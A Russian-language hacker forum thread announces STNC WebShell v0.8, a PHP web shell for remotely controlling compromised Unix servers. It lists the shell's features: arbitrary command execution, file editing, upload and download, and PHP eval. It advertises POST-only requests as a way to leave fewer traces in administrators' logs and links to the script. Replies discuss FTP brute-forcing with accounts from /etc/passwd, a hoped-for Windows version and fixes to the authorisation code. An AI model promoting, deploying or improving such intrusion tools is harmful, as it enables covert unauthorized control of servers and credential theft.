STNC WebShell v0.8, (c) drmist

Команда Security-Teams.Net Crew (STNC) рада представить Вам свой очередной релиз.
STNC WebShell - это php-скрипт, предназначенный для удаленного администратирования unix-систем с
выключенным safe_mode. Его характеризует оптимальное сочитание набора функций, размера, удобства и красоты
интерфеса, а также простоты.

Шелл был написан мной, возникает вопрос - зачем, если есть всеми известные r57, c99 и remview?
Затем, что я испробывал эти и многие другие шеллы и обнаружил в них массу недостатков.
Начнем с размера. Многие шеллы страдают "избыточным весом", не я один считаю, что размер 100 Кб не
оправдывает набора функций, присутствующих в большенстве существующих шеллов.

Также некоторые группы граждан желают оставлять в системе как можно меньше следов, чего не позваляют
перечисленные шеллы. О c99 и remview говорить нечего - практически все запросы передаются в них
методом GET, что незамедлительно привлекает внимание администратора системы. В r57 немного интересней.
Несмотря на то, что пользователь не видит непосредственно в адресной строке браузера get-запросов, их
можно обнаружить, заглянув в код скрипта - пользователю приходится соверщать массу get запросов за одно
обращение к с крипту. Притом ради того, чтобы загрузить пару картинок(!!).

Эти недостатки были учтены при написании STNC WebShell, что позволило добится следующих характеристик
скрипта:

* Скрипт обладает следующими функциями:

** Выполнение произвольных команд
** Редактирование текстовых файлов
** Download
** Upload
** PHP Eval()

* Комаднды отдаются скрипту одним POST запросом. НИ ОДНОГО GET, а следовательно меньше
привлекающего внимание мусора в логах
* Удобный интерфейс, напоминающий r57.
* Все это в 6 Кб кода.

Маловато? Это обусловленно тем, что скрипт расчитан ИСКЛЮЧИТЕЛЬНО для unix систем и ТОЛЬКО с
отключенным safe_mode. Как быть, если приходится работать в Windows с safe_mode? Придется подождать
наших гредущих релизов, или попользоваться пропатченным r57.
С учетом перечисленных условий, возможностей скрипта хватает для того, чтобы тварить в системе ВСЕ,
на что хватает прав. Кроме того, мы всегда готовы рассмотреть ваши предложения относительно модификации
скрипта. Например многим не хватает алиасов, и мы подумываем их добавить.

Скрипт: http://www.stnc.ru/ftpdrmist/scripts/shell.txt

(Эта тема создана не для восклиуаний типа "Респект" или "Боян". Здесь обсуждается МОДИФИКАЦИЯ сркитпа. Также здесь слудет постить eval-комадны.)

Eval-код брутфорса локального ftp-сервера по содержимому /etc/passwd.
Проверяются аккаунты login:login и login:nigol.

Хотелось бы побыстрее дождаться версии шелла для Win-хостинга где включен safe-mode. Или Хотя бы узать принцип, как заточить шелл под него .

Скрытый
"Заточить" шелл не получится. Однако уже имеется очень оригинальный и удобный принцип. В настоящий момент он держится в секрете - чтобы не дай бог, кто-то до нас зарелизил.

модули?

госоподи упоси ))
гадать бессмысленно - раньше такого не было.

чета авторизация в опере9 неработаит

Eternal
Юзайте стэбл-версии

Eternal
У Вас просто в опере не работает или в ие работает, а в опере нет?
Надеюсь, Вы раскоментировали часть кода, отвечающую за авторизацию?
то есть в коде

нужно убрать первую ("/*") и последнюю ("*/") строчки.

drmist а как работать с интерактивными коммандами типа комманды смены пароля